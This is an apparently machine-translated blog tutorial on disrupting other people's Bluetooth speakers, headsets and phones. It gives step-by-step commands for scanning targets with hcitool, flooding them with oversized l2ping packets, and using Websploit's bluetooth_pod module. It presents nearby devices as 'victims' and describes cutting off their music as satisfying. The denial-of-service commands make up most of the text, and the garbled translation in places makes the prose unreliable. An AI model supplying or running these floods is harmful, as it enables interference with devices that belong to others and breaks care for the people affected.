If modern Wi-Fi routers are capable of filtering out unwanted packets, then most Bluetooth adapters are, to say the least, blunt. By and large, they do not care what package and how much, and even more so how many of these packages you send. Therefore, it is absolutely easy for us to increase the information volume of the ping package in Linux to a huge value, and then send these packages to the device with Bluetooth, say, 1000 pieces.
Now in order. First we need to find the right devices in range. To do this, use the command
$ hcitool scan
As a result of this simple manipulation, you will get a list of available devices with Bluetooth with their MAC addresses. If your system does not see the Bluetooth adapter, then I recommend installing one of the Bluetooth managers for Linux. In Kali, gnome-BlueTooth approached me personally, which can be installed with the following command:
$ apt-get install gnome-bluetooth
You can also use the Blueman utility:
$ apt-get install blueman
Having received a list of potential victims, you can deal with their blue-tooth devices in several ways. Let’s consider each separately.
The first way: l2ping
We use the following command:
$ l2ping -i hci0 -s <packet value> -f <MAC_address>
It will generate packets specified by you in the
<packet value>volume parameter and will send these packets to the MAC address recorded as a parameter
<MAC_address>. In the end, you will see this picture: in the terminal, the response time will gradually increase, and on the attacked device, most likely, Bluetooth will simply turn off. After some time, it will turn on anyway, but the music will be interrupted, and some satisfaction will be received.
The second way: Websploit
There is a more elegant and convenient way to drown out the speaker, from which come the cheerful sounds of rap.
We launch Websploit utility:
We type the command in the console
$ show modules
She will show us all the modules that work with this utility. There are many components that work with Wi-Fi, but we are specifically interested in the bluetooth / bluetooth_pod module:
$ use bluetooth / bluetooth_pod
Now you need to configure all the parameters and provide information about the attacked device:
$ show options $ set bdaddr <MAC_address>
To accurately and surely ditch Bluetooth, we will resize sent packet:
$ set size 999
All preparatory actions are completed, we can launch our “Killing machine”:
At the exit, we will see a completely similar picture: pings become longer and the music is interrupted. Beauty! These two methods will work with almost any bluetooth speakers, headsets, and other similar devices.
The reality of “Bluetooth hacking”
Just because manufacturers do not release new firmware for them, able to filter incoming packets. So if you have a laptop with Linux on board, you can definitely call yourself a thunderstorm portable speaker. If the column copes with the attack, you can try sending packets to the phone to which it is connected.
If you like then please comment on twitter and Facebook with #bluetoothhacking